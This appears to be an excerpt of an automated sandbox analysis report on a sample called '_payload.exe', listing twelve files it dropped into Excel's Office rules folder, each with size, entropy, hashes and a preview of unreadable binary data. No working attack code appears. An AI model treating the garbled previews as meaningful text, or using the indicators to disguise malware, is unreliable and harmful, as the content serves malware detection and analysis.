                                                                                                                          Preview:<?xml.A6...P....1...#... X{.k..l\...6{V:QF.II....b..2.`.)`_....d..:'%..Dx.:.|...c.TW.k...B].g...gO..t.....V.^......I..3....<.....O..o..=.f.W....f....`....&....n]Q...UM...!|NX2.N..x.*c9...~5.hyY.o3.rx*H.G..b...4_..B"..e.c....b.T.A.u7...T".j..IK>0...,.>.{..9..#8.......{my....'....-..i.G....=.%..i.$.;....DU.A...........'2...C.....".G./x...o].......j.....+.2Du..g..N..{'Pe.......@....w..&g<..$.kX..:.e1..q..(....RW.U.$....0.y....G...Q.......ur..e...? ........h.e..0..KZ.v...g.........{.Z.Y.....,..9V.|.YYM.....)..4......6.*c..*...)....j4..m..4.E.]04]....M.5.,..:..q.H.P...@.G.-5w.[...qs..u......Rj.=..cq...YEb..mb..Z.-....U.!.K....fkSH.........U.(Hg.7,hv9@T..C<.C.........9...R..Q... ....5...ki..}.1..d..G......-'..9#...S.....W......F.6k.S.`.&6}.y6........|;v..U..Z..7r.m..... .A..eC:X.SJ..;...]G%....x.cg.u....X8.."Yfqt..I.......bX...4d.g....9...\c>. dR..y....@...... 4..X..,y.1.....+.K.....c.@..&..}:.h.&O..*:......'.Ns.tC.Su...=b.3..ND/.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500005v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1144
                                                                                                                          Entropy (8bit):7.814528372791692
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:iZCXmc88Vgx5/oUBoiAwO4h0/iNQCNiXr91yJjf+U+3qVaHuPXgyesbD:s95/TolwFh06aC0XrqJjIxkwyemD
                                                                                                                          MD5:4D94F6A0C9087CD7834438BFCD12EF47
                                                                                                                          SHA1:89625D7B016A339823CCE3B34FFA7B9C8D9A42D4
                                                                                                                          SHA-256:89A22C5D8F3EC858760CD1E9117F9987E764B883896C3773FB3140B331E7CCD0
                                                                                                                          SHA-512:983CAE63ADB5EE3651ACB3885C50624CDCC1462BCEF2B6169397CA7DF16F19EE34AEA329905F3DC8F5C994D5F381472FF4EA8DE7DA3A5C25162844832CF8F631
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....W.;=.7.R.j...X.Jo....n../.2.5K..`.!..2.m......D<v.*.,...\K......n.......%.7b..Lun..... .I.b@.c...jP>c.#....tW...<U....H.q.(R..C..fa2.<C...X.Chk+G..,..FBH.?..]>49........./......t.z...jM*....a`k.;.BS.mj..e...........\Wu.A...]N=.)..q4...;?.].ng...qXc.ZY.%...G...Ug.@*O)y.........].(..i{7...)HE4.....'%....F..r..IN.~]......b..!.)..!.8.u.v.)0v.^.-^.e.S+.......]......q...4.d....2.*.._./9U.H. s9.........}X.2.H...d..p...;.f...5.(f~./.U$E.Q.%.......eV.p.<O.$O..Q.x..|.N... ...h....,b..D:...../.....0.....Q..1...Va4.h8..jX.8.....83..x..(.F....Z...*.........oiq.M..',....}.<....&..^.....|...LPqit....` ....s...ec.x.I.y`....f..O.. .4p..K...,.K1..~...A...r..g.p...|...e....Q.7.}.9<.......<.^v..X..X/..d.V.r...Q...u.k...8..]....B..8d|.Bi.....`<.A..E.5.xt....K/.l*A.ss.....~.s..]x.oIE...).,...qnM...)..`4"'.....S=(....*..bLb..5...G..cz.Av5^5....t~dc..j..j..n......K.Lx.Ie.wv...b'...z.o.\.j`.fV.+...".."..$...2...K[.2M.......E.S..79..w........."

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500006v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):848
                                                                                                                          Entropy (8bit):7.708148218149329
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:RHIAlvCSJW6FHvQmy1Y3cp3pN/aE3Yecg7TkUUGsnA7vUWnGUbXaHbMh/Zq5bTcq:+ATvQmyS3cp3pd3cg7DIA7se1SbD
                                                                                                                          MD5:E4B37C6ED4B6AD05A3D1F99C2D72A06C
                                                                                                                          SHA1:2C137537BBEC85686A2DBF6727C9EEB142358B0D
                                                                                                                          SHA-256:54F19651B18C57D51B69271506D3BE14A70B15A029A3A47886E4FAADC4408780
                                                                                                                          SHA-512:ADC1EC53DAA52ABDF02CE4E93A8BBB7AF31097D5906BD29808B7E31727A18A0F860F1484E652C48AB3B5B2BA9202D3FFE2D61F83D4B4B04804B6CCBEAC9D3CCD
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.z.....D......2.{q./.Gd[.lB.;;... &weY.C>..h.l..vB.E....Yz...q..%...\P\...qk2<...._?we$0..U.z.z..Bwt?+3...{..|.[tdL....5--..M....}..F..i...H;:M.1....!..^7..E}M.^FE...y.D.>_L.....A..._a..&.pu....EE.....e.An..q.../......IT....`h0...c...N%.....(.c..F..|8 ..i).I.b.l.]GPe...%.dg..5.*..?....C....UF?J..a....C.~......r.P.T.H/%..9./.3oz..S..V.o...v.....E..{.p...oV..1..H..=.J.Y..^C#N..G8ab<&4.u.V.h.*..`.W...d._.B...?....b....**....Ux....,6~-..4.3...q'^o|.6.....j..hN.I=..Y$....z3.B.;.^..2.....N.S..!.V.u%....C.i...R......&.{..IMq.{.&.=].....^........:.q..>.........W._nX#3:.Yg.*.xY...F..-l..+.....jD&.58W..Z.2."..R....%...43G..:..8g.........$...c.i...x.; ....].<.DAx.^.+p.....Z.x.]q......^.H....j..9C..f[...v%uF.k[.........e,.$.&|.....rphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500007v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):767
                                                                                                                          Entropy (8bit):7.720505521125068
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:QX8K7SBf7vAMogNlTxo89huPGejTkM82bD49FSed6Uj9FPG7pTJ9H77mxLgD9zqt:Q0ZTAMo2TPu+CRxE9FSuR9VG7pTf76xr
                                                                                                                          MD5:2795D8DE9B7D5DD71DA0BC86AE505973
                                                                                                                          SHA1:F867E84BC040EC199A76ADDF5DB83585F85C4083
                                                                                                                          SHA-256:6EF2AE194879DD8AC3E37FEA443BCE9C9F0366ED5F3A8DCFBD54ED80AE1BFC79
                                                                                                                          SHA-512:4A48E7E9421F50CE5DF35E863F7C28353CA9184D9B47DE60E284D3425E646444FD1C74A46A3C201C2B789A99DBC2FB4E0C05E5638045D5E45DD3D47F1DF6D791
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..r.'...3"R...~d(.q]+ ...I}...4@.6....$.P.puu....fI.#...R<.;...J...G.&....a4...6V.KxS%.c....,.z.0.B...2~jSn].aI..U......\.8.....d;.g$E.......b.X.T...{..>........l.".i.n.`Z...`v."...R..7.........jr.h...)..R(.....!......RD...%9p.e...P.....N......g..W.!h...Y."..u..........#./.Vi...a....]...e.pu&...(.fo.J.n.....-...Dw.....T..$a.$..z.w`N..MB.34.V...h.o.3..T. .gQI..{..T3.j4...._.}4.4.. .(.-.V..)......Y.hTr.|....t...6.1.C&.e^.).6....SmF.p su.F>.....jv]...d.17T.....oC.9Q.....}Yg[.......v....k.l19N...D...f")...K..x...\Yi.. .l:..Pe.`....@Cz'Y...~.;..^.....@....;.b.v.*.#A..D8.uk..j......\#...>.P.#.,Z...].R..g..0.O.....u..NB#.%..Tm......g.k.......H._.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500008v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):845
                                                                                                                          Entropy (8bit):7.748175975177806
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:JwKOq0jdYGHJJiIRDziwIMo/ARJKo180S4bD:JwV1eWfN+Io/OJKD0SiD
                                                                                                                          MD5:7192A021EA32CCA3158C9A521DF52F6A
                                                                                                                          SHA1:7440968095DC98800D84017C6EFA7849455284D2
                                                                                                                          SHA-256:C6D024D44CD8C52452CB0CB524B73215E8D7E0CA8226DB65C1F06BDC51A78192
                                                                                                                          SHA-512:C41873A6B84298A840DC45236433AC5D0F57D7401E96E1F431EF71E8F88DEBAF7ECF2F7DF29674E374F72A63B35FDE14B92D6572AD5BACA0E5A1EFD0F342ADCD
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......s.........J.}.....}.%.[..`....\../rM.e../.~Y8.....`.G....'...A.._.. ......!h.........cV..e.......Z6..t.=.1<..r....N....e..U..TAb...P.6W...a$P.w...%..v).?.*l.Bn..|.`p....$......hR.\I...A._.....6...g.e._.4...l.4aDW.}....R.[z.....S......&....J.7O...,1.../.]......oU.q].d.M.s.T.Pf0.^.1.3#.~....GG.(Cq3%~............P.EOd`...,.....;.=...oE.-...V+~.V...(..J...$B.$(E8?..9..|.-wU.<.K...6.wHe..v......1].Tm.......c...`vi..n[...P...G....f...N.cV..Q...Y(.8.^.....Z....V...m..C+./.Z+..d.+-.~......m.&.C..Y.m..F.}=)Rf.e.o...H*..........cDT.#.....e$F...Yc...a..S..f..tmt.Ld1X......$M..=P........$.0u...I.V.......o.Y......xO.p..d.!.M.(.Rv.w...;..<..WJ.G.Y.M...~o.TY.....Tn...:].]....=^w...#:h..7%3..."oZ..v...g.l..A&|a..:..KE..\..D.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500009v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1233
                                                                                                                          Entropy (8bit):7.80717799000591
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:CLT2PMjrQvkVnhYflh8yDOakdA2H6j9uSDRAD70nrDwk8C4fOmgbD:Cn2PyrQvkofTRT2HeuSDaOvtm6D
                                                                                                                          MD5:416B6D30A974808A6FF4924DE6F6CE47
                                                                                                                          SHA1:97BB30FE93F96741AE83FBAC90978B7941A52A86
                                                                                                                          SHA-256:78CC9666D451CC2CC7E133748A989436DBDF428BA6A5AA82B14ABD06FF100B0B
                                                                                                                          SHA-512:A355C0B60DCB048C8FD8882D0CF52C804CEA55AB248207B69016BA03A61DFDDA1B3588093E3E788969C509512EE55C4EE978BD5BE1B51FEE2704C6CE1E10C6D5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.Po.K.........<.o..U+.O...X..I(H......<,F..#?m.f....u..y..!...6-....7..qMz..r@...ks+/jF..P.....].>...~-...`....+Nq.3..9Cv......a.w....X...=.9./..Z.[.u.t.R.R@.E.m3g.FGFg.0..o......m.13......7.(.32..#...E...?.s8.[4f.,..g.K...m.Hg.....K=........9.m.......L......t^..f@J.Z....`P.Ds...z.~e....Fz.k}X2-...|."...5#:..Z..v..1..........X7.....5.v++*....-.6V[.....6.7.~..A...>...........F..e.......d=..k..,u..>....t...5^...N... .....n..Pt..i..a.=Cr{f...]...1BV....6'.y?.B...8tR.....^..q.1.c...]..../.9s3_1X".].{..a|.3u....h.9....y.[n...$.Z.'Y..g.{.%q?..An.ML8...SA...s..B..~.1..d...ZD. ..t.Q..:..z.g!..........evH#..k.\,.d........i.^S../.o..4...98.9)....x..$..:.......-....r. ..4.$.j.$lQs....c.K...\..i.H.....e)0V..q.p4..v.~1=S1.j,%:.kn3G..!y|dg.clo9..D|.*...F.....N.....4..J'"G..s.....Z.S.q..r_!5.D...e.1..Q.0Y...SS.[L.JQ}..b...6...2.O....*B^..M..jo......e..#....x.t.P.).{..Y.T...5MN.....&..Y.aj.F...\Xm...B.1...ne.HfS.C4..y*........z.....4&A..*.P=.....-...`.M

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500022v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):934
                                                                                                                          Entropy (8bit):7.797510635515244
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:agDZifk/B2Sc/FymYGEGBAzKD+IeUPlKFKYwP+bD:1DZiCB2Sc/FyMEwD+IeUcYP8D
                                                                                                                          MD5:050D318126A93C7B2548B7A067181E9F
                                                                                                                          SHA1:94136BBAF79A420AF12D8A53C4999A324E66EFBF
                                                                                                                          SHA-256:032AFA763D1992DE346B04E736AA336A2A2F65558AA2747AC00E1686A6C1BCAC
                                                                                                                          SHA-512:AC445886037BECC985E11E803C5F07AF7C94644BB4ACEDF840C2CFD659D5075088815CE372742261D59CDC5A0E629D95BE90352716E9FE7ECA7D4E7A2E77D70D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...!@.....5...y...Yj.H.0.yO..j.\....AM.W.p....}.uD.v`.dLV....R..p..gX|..Y".....{w9......d3.A..(..M.6c)u .&..q`R3.....M4.s..y..G.3,m....?.A.._....U:.~.VQc..f>...9......e...Z.('EJ_..p&.T:..q....w..zCj......(.Si.X.=1.9c[E.e_..3v.5.....q.3;>...b.1|@....:....v.E.=......`...P../..T...D+.2c'..[....5.....d.)...`..L(dnG.i@iQ.B.M]...GWcw.....R..Z.\[...@.b.*.+...,X...~h'..W..SI."......w.....h..rl.k.!..drG.W..4.ZN...?.....h...0..zh0..F..u........@u.c..........fl.>...U.9R.........m.......L..N.....2....^....Nl........lE.v....a?s.n..-..{.'....x.V4#L.8.....q...}.n.7...9..B$..._Z.......Q.4b.e......2......T%2.*.....&..WL... K.@..E,:...M....?t...}.T`...%5..}.H.k.~.c.V.V......j..!?...,.].!ZX..EK^....m.+.L.H....i.9..fJj.........f...l.2s...g....6.<n.....FT.....n.cD^...:."^......x.g..7vj$.,......................d..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500023v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):969
                                                                                                                          Entropy (8bit):7.800060286030321
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:K6r6MkyYALTs5WUlWQne6awIxj8XK+YbD:36MkKTEWUAQne6awIj8X2D
                                                                                                                          MD5:BDA202443846DB644F65347533768392
                                                                                                                          SHA1:53A52AB4C8FB1BEFECAEBCA9E8999D01F3D3D1FE
                                                                                                                          SHA-256:BBA142298B910659E4EDA1BB98255639D73507ACFEC58B49DDD75A93B9CDED55
                                                                                                                          SHA-512:FC970C5A207DE825B708B796FEED2D673CEF1AD1B1B93AAF5AB4A1A69BB41CD71801177C282230B1CDBB3787A63A02FB13F12ED3F5DE14D1ED55BBB89E13DBD9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..[..n&%<.`f..4.O >.T.Q2."?.7.^Sgz.0.w..?...m./..G.&9..l....2.:....Oy.t.......}.O...0.V..E...x`J2...D...%.Q.."....u.B...?.........8.H.~...r...W..p...'?....q..IM.?.A.UK.j.z.&..}...LU`......XNT.A....$.aW.[...a.*i....p..2...fjiZ.76..uA.5..*7..[.d....p[).D..v..\..S..$(8.....3.PA........;f..&.....V....^.H$.....f.@g.....ddu:...T.f7..\.H.C.v.H..A%..KF..u..{..B...j93a..... ....R..3%...rBf...\y....F.h....1#A\.?U...rh......1......~r........*.....:>.....@.]......B&.....6X...$..[8....Y+..w.d%w.=.Z+.y.0.-..[.k& .c.P.\.8.G......v.%.....{......K.w.).3....+./h.... |7..M.HW5...f..6;w...*._n.`..2j].M....#..:8...%-...9..%.[8r|..m.F....<..._&.4..}.$.7.N.J...*...x.^.4..C.F......9....G....y.Y.t..6.S9.d.;N|..........F../...\_...N...........n..w*.....x...o..2..Nu..........D8n..i..:W..)...<.)...,-...+;..}e\.{..:.#z..b[.-.......#RUr..a^G...].-...hbc..iW..sXphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500024v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1467
                                                                                                                          Entropy (8bit):7.855843681731173
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:VyawH8AquiVIw0SHrUKXfI/acI+VazwCVJIFSlLUVC3IU34B81SBSHbD:ADHAWR+lXA/acvazVIELUI3IU3x1JD
                                                                                                                          MD5:2C67BE28C41334AB7B299B0D9DD72091
                                                                                                                          SHA1:5C15F54DBE52DF654C08DE8025DE4C84068A1194
                                                                                                                          SHA-256:5F20B09AF32B523F51ABC4502CE8675AADBE249936EB49B5A5086B6DAD578F31
                                                                                                                          SHA-512:15F624DD72110B6F02F39774A5FFE71101AD385CC846C7CD83CC525475A2602495ADD61294DA3873AEEB8ED5EF009A8D9A51F3EEB9324D60854FD210CE918270
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlB...Gu...!f.%.E...E....L..q..Cs..Glv'.&..ve..<..2.g.....^%.[...<j.._.4.[...v]a.=U3rD.P..g.@.].E....Dmd.mU....q.>.........R..'`.9.8...+..x....#..?uS.M#L..Tz...g...0.N..K....x0.?.![...w...F.7@6%.5A ....1g...Z.\..Y.6G..s(U.JY..p........y#..Z.HX.E:.>O.....WL.:N..2......l...\oH.7y...#`..6}_B../.).?T...wX.....`.A`)...i.<......~...#.^.b..E.....hYg......<..^.2.....=..T.+.u>o~h0..ui3...1&.....b\...h..J5....7....>.iy=EY.!..^G].....q.o..1A\.i`.g6.e.g^...M...s......@.."$.Z.S...v?5.(.v...h.h.....P.w....w.....,n...tU.1aG....<%`*v0....t...+n.u5.....+./...x.>.6...&\F...).k..H}.mu.`.5....qm..8.@.z...+4...lO..~..l..Q.5)...]2)....E#OO.63...:..o.>.)r............ H0.N.%8..;Nb.t..,...*........p.UC.....[..f.x..`..P.A)7.b./(.g.N.r..Pt...k...#.....}..9i..pA...:.Aq.|.K...y ...q.w.>c....5-.*...A.~..q.7.R.....g...8.-A.....ok..,...T...X...p.!.(Gm.l......3!.._...Qq7....0...g....h.97.)\.......3,t.9..!U0....%.*.X%..D0J).C.G.(....a....c..a...Z......>...h.d...;...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510000v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1397
                                                                                                                          Entropy (8bit):7.849094026812729
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1MI+XSMKpASEQ9XJL09mvEuSC06ekuc2y/y7F55Qqz5THf5nUk/CQzkko1WbD:1h+XSMKe5QdZkOlSBUh/y5B1HKk/3o1Q
                                                                                                                          MD5:DD73A4D682C1AFEAC7B638EB06B2D32D
                                                                                                                          SHA1:4920CCDD2E2BB54C930ECF4F1C6FF53E5738E633
                                                                                                                          SHA-256:52E36CA572A40C499D406EFA20EF29A6169150369C3825BEDF110E2862D7D4EB
                                                                                                                          SHA-512:33D225403AC4FFA3EDC20D4454437E231F698A224BBCAF778B77D0C4EA03F7437157C374B1BCC1A9D9E3F49DC322ED1169070BBFD2DEDB1F91E5F1FF35A2089C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlH.....9.*m.P..b.2....j.9"L....b......h.7..........v......di.......e<........J>.l..I@..".:.-.2.8..Bbi..Cjs..T%6...{*.....w..8....'..V...V...'..j.N..P...x..2"....F.(....?.!,../.y....u.../..s..N.FY...... ..v.B<..mP.p.}..]ivpF....XKc.4.7.A..1Gtmx...f..S...b...c.ec#6.w.aVf.4U.[...G..l4....V.........+/..J...<_..e...E..<=...\.A...x.@../.,..[.&..7..y7@Pp.z....$.D...k'.D...H.1.....XuB.@.....$I..W..XSQso...*e..U#D.2d.....}..WDH=t.,.U7..Sj%X1......X..l.=.@..1$q\T.Q.Quz.$.Uv{m..bC...2Y...............p.q..le.u.I....u_...3.D....o.....>..XAo(.40.Yu..Ew`(..y..C...."e.-t....:..P...M@R..;.g.....=....%...,......#.D.d..t.d.Vf.....r.BF.Py....@Z../SK3..........@w.{..y.|.H4.....?-6.8.LA.U.7J.;Z.....t8........D...-.6..P...H.o..;.TQ.g..Y.d....'.L......".4U2...%.?Io;......U..b1y..I.<M..D.fXc..^;4OUB....c.2.a...J.C.....Uczv.V...0.3.z.j..;..$P...(i..c.."=...$f.k..........,~.x$HV=.~..i.... ]..p..g@......#L<...7......0.3..rA"..i_...^.i.`\.$..k.l.x...Il9

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510005v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1269
                                                                                                                          Entropy (8bit):7.824011309815926
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:JZBNNtVs0jJom15lUheAxOLU7wQNrTJFeTb1C4y4manCmviXMBdAr2WeusMPbD:LNtVs0jJom15+heAIAkarduxX2anDiXV
                                                                                                                          MD5:984D96FA51D4F2B83576C445A639741A
                                                                                                                          SHA1:95B28A52FD72A20E3610396DEC0552F4D20FC17C
                                                                                                                          SHA-256:1F240731C7FB0D0B5154EB91B1ECB840FBF2334C23883204A05E3A58FF8B1006
                                                                                                                          SHA-512:7CFD925B032344ED6BDF993418DD02705CA601C4D72AC1A190AE3F1C9A8F13BBE6944AE144F9EFA10C713041C14EA6A12331922B57218674EF27D48D6E7C0C9F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml/......A.t.l.`..C.t..R.e,.=..1......B.X...7.Q.t.Y..ra.3........Lg.l#.o.5<...*v<`f.ea.v..u..{.a...q4.e..{......n.zRr.HL8td...wjg...Wq..g...V.L^0.n..v.u5Q..xO..2.&...P....)^m..... .2.|.=......88uz2.u.!..*:X...y....gM.@..q.6.E.....|.26]..|....k..'.J.E_...C.....4....#$...._C;.V...d..w..QUM...0.a.n.2.]7......dv..@[..........H...Q...K....`}..%.g3y.}<.3..oP`........5f....z.!..Q$Y.GH.%l.H.1..!..u).G.t..*...`K...b.?..h..y.0\..)...j..1.G..p.c5YY...j.daw&.\..4.8....JM1....5....^S\ ..%.Jh.....rt...V+.......0.k....9..M.....=K..a..R...C..nL.....-.oP.....a..Q.-...C2.. S(.....N.Y.;.W3U..|.....h).1...%p..).......R.........4....-./..0F.P9, 2...~......t...E+U.O$3$...../7..a......F..w..y.{..B+..j.;#.(.D...u<..P.Ei..].b.z....B...ct,6.3.{.COs..N?.c."..Y..=qmr..E `..F^.7..M27.........hf.X{S...}`6..0..s..O..Y.f.SXgF;s..p.Ylzs..~...9m..IE%.[.KO.'T;.......'y...OS<w.......NR.O;.1.w..Z.!..<...}2.~.r._%......D...O2F...6..GN.3..;y...ko.5b....2.q.9/#7.].

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510006v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1088
                                                                                                                          Entropy (8bit):7.814692144490247
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:iJJ6PRDfHU3UKgeRFc707Ap6wXlXsg2xkq/F1lRC3P0CiwbD:kYDfkUFeswU7XlXsgULt3UcCiqD
                                                                                                                          MD5:EDF9F01D349100B788D7BA40E2B1F7C0
                                                                                                                          SHA1:ED1853B4D6B313D8E7251216D9AF8AE3668CC485
                                                                                                                          SHA-256:9F4A0CE32399971F963F032C0ACACE6788DCFCB14E67C6A38F8FD8B085FABB8F
                                                                                                                          SHA-512:706F6104B7AD1D6F1E27841608A44FCE6B4D3178654B2BC8B3858A78303612F6818179A6DCC2CBFFA9FD46F14326339FF520A9074BF0E76E07655CBA42AA3EBA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....}Jl....-...../:.T......n....O^.w@.x..l...lJd.L1<..M. ..C3...m3x......P...e...Q,Qh.....T..xC[.Ky.m.....ol..$U....4..C..).@...\;.6o..+......0g..~...Jmda,gvn....K.ST>.l....._.....4&....Z....l..<...6g}q..u......2...".svh.'....>....}<....L.....A..y...).]....a.@........*U.pL.b....~...J..#8..O....@../t*.UU...u..,5..%..g+K.*...B....h..K.54;L...5\g...."i"..WW4-.Bo..'..p[y..k..d%..h..l...E....i.".l.<n.@Y....-#../..y.....[..........._.:u}...z......{..L.....k.tHc.-...9h.m..j....-...w;Dcl.M.l....<n\.....hM..j..S.8.<..X...|0..7......(X.u.:=.)..k..s..E.X.1c ...X.4c?J.e.....#a.....a1.....Nn.!.....j.`h6~.Q... ...T.*.j. ..~k.....n.L..u.L=..........P;.%s....x....g....h.....CD..<Z...Ly.kTZ/"..u..5.?.H>.#......[6.l|8....,B.)ha..T.\.m"d...%......J...2....A.7......>.l.O..dn\1.r......:,/.......r.n......p.=|;.@z....V.....oRu.....z.YA. .sE.e&w.X.2.&e....n..4..+. |3..N..g....hb.I..Y..]....}.e...2...o(...("..dj.......pt../li.I..<..)i.,.......W.p.Wo....-.C..q

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510008v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1100
                                                                                                                          Entropy (8bit):7.800436726253271
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:I9JIkFZl4QTtKC1QMQEB/OaoU4++ad+PK8juhRWbD:I9JhK0Q6maoT+/WKhRED
                                                                                                                          MD5:0543E1B3120EA105EF2E5220ADD0876E
                                                                                                                          SHA1:712D592AD9E930BE61A2C2107C3164CAA8C5BF91
                                                                                                                          SHA-256:7388FEB34FA23A83870898378283C9028C6709F2EF11DC0920522EAA9D6E63DE
                                                                                                                          SHA-512:643745740C7F6E9159FCA581A3725BAEA2EAD4E3F4D952300C43BE01C61F2061C3984B46355988ED6297CB84295582C7AFA57E26640B78D1BFD6CA6783E62D0F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..... .+-.CN..Hh...&..H...n].."....'.w#.e=)............N{.q..'.h<..%.U...$....Y..E.6o.A......W%B.....`.W...]D.....j.ej.lY.z.._..^B.j..".}i6.c....iy...e......g..>.....n.A._Y.)..G/......S...}x.O0....n..e.-....w.....g.........NMi~..ZTH.|-...H.:...|$^....D.s.....g.U.....1}y..c...1^pZk..........n..c.!b{..O.Z...i."u.6..'"S$.....d.C..Cm.P.JkN.=..K..GW..P.... ..Of^3...c8...0..e"e..S..;..x.(.*....c6.L.F/.:u....qs.........n......bKO.1....X.b.....%..3..L..y.t.zG[..1m..#u.N..h...e....ZqI....O.".v...nt.h...R;.".h..F..D.@.....".p9......0F.._`...f.....H.j.'..?....m..l..p....._.R.8X......."...c3.FS".&..2. .LW..)\k<'.....M3\mz..`L......J...k...1....G.r.......X=%M./....#4.5....]i.L..S.e.......Z!.......BC.j.y.c.v..h.K.2....H.NTp..[w{.k.<.Qv..j.'..\J*......1M.#"c|%U.1..X./.v/h&.J.Bx.RD..a...?B....4.f...<.)......6G9...3J^z.Y..NG.E}.....528......+.Z..t.....I.@...p.c(.d.<..2....j..1?B....r....G..U&....=.+.".......|..~N..F..A...q..(...e...

